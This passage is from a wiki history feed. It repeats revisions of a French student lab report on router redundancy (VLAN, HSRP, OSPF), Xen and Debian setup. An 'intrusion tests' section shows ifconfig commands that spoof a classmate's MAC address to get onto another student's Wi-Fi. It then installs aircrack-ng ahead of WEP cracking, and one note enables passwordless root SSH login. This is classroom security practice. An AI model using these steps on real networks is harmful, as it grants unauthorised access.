&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
Nom du miroir de l'archive Debian : debian.polytech-lille.fr&lt;br /&gt;
Mandataire HTTP : http://proxy.polytech-lille.fr:3128&lt;br /&gt;
Logiciels à installer : Xfce, service SSH  et utilitaies usuels du système (à valider à l'aider de la barre espace)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
Pour cela j'installe aircrack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install aircrack-ng&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Modification du fichier /etc/apt/sources.list : &lt;br /&gt;
rajout de contrib non-free&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/network/interfaces : &lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static &lt;br /&gt;
     address 172.20.106.6&lt;br /&gt;
     netmask 255.255.255.0&lt;br /&gt;
     gateway 172.20.106.254&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/resolv.conf : &lt;br /&gt;
nameserver 193.48.57.34&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install firmware-linux-nonfree&lt;br /&gt;
apt-get remove network-manager&lt;br /&gt;
apt-get install broadcom-sta-dkms&lt;br /&gt;
modprobe wl&lt;br /&gt;
modprobe -r b44 b43 b43legacy ssb brcmsmac&lt;br /&gt;
modprobe -r wl&lt;br /&gt;
modprobe wl*dmseg&lt;br /&gt;
dmseg&lt;br /&gt;
ifconfig -a &lt;br /&gt;
reboot&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22954</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22954"/>
				<updated>2015-11-13T15:44:27Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
Nom du miroir de l'archive Debian : debian.polytech-lille.fr&lt;br /&gt;
Mandataire HTTP : http://proxy.polytech-lille.fr:3128&lt;br /&gt;
Logiciels à installer : Xfce, service SSH  et utilitaies usuels du système (à valider à l'aider de la barre espace)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
Pour cela j'installe aircrack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install aircrack-ng&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Modification du fichier /etc/apt/sources.list : &lt;br /&gt;
rajout de contrib non-free&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/network/interfaces : &lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static &lt;br /&gt;
     address 172.20.106.6&lt;br /&gt;
     netmask 255.255.255.0&lt;br /&gt;
     gateway 172.20.106.254&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/resolv.conf : &lt;br /&gt;
nameserver 193.48.57.34&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install firmware-linux-nonfree&lt;br /&gt;
apt-get remove network-manager&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22953</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22953"/>
				<updated>2015-11-13T15:18:59Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
